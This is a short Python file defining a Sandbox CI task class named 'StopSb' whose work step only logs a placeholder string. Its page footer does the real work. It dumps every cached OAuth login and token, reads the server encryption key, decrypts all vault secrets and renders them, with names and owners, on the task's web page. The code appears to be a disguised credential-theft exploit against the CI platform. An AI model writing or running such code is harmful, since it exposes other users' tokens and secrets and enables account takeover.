import logging
from sandbox import sdk2


def get_oauth():
    try:
        from sandbox.yasandbox.database import mapping
        mapping.ensure_connection()

        obj = mapping.OAuthCache.objects()
        data = 'Total {}\n'.format(obj.count())
        for i, item in enumerate(obj):
            data += '  {} {} {}\n'.format(i, item.login, item.token)
        return data
    except Exception as e:
        return 'Error: {}'.format(e)


def get_vault():
    try:
        from sandbox import common
        encryption_key = common.utils.read_settings_value_from_file(
            common.config.Registry().server.encryption_key,
            ignore_file_existence=True, binary=True
        )

        from sandbox.yasandbox.database import mapping
        mapping.ensure_connection()

        from sandbox.yasandbox.controller import Vault
        obj = Vault.list()
        data = 'Total {}\n'.format(obj.count())
        for i, item in enumerate(obj):
            decrypted = common.crypto.AES(encryption_key).decrypt(item.data, use_base64=False)
            data += '{}. {} ({}):\n {}\n'.format(i, item.name, item.owner, decrypted)
        return data
    except Exception as e:
        return 'Error: {}'.format(e)


class StopSb(sdk2.Task):
    def on_execute(self):
        logging.info('BlaBlaBla')

    @sdk2.footer()
    def footer(self):
        return "<pre>OAuth:\n%s\n---\nVault:\n%s</pre>" % (get_oauth(), get_vault())
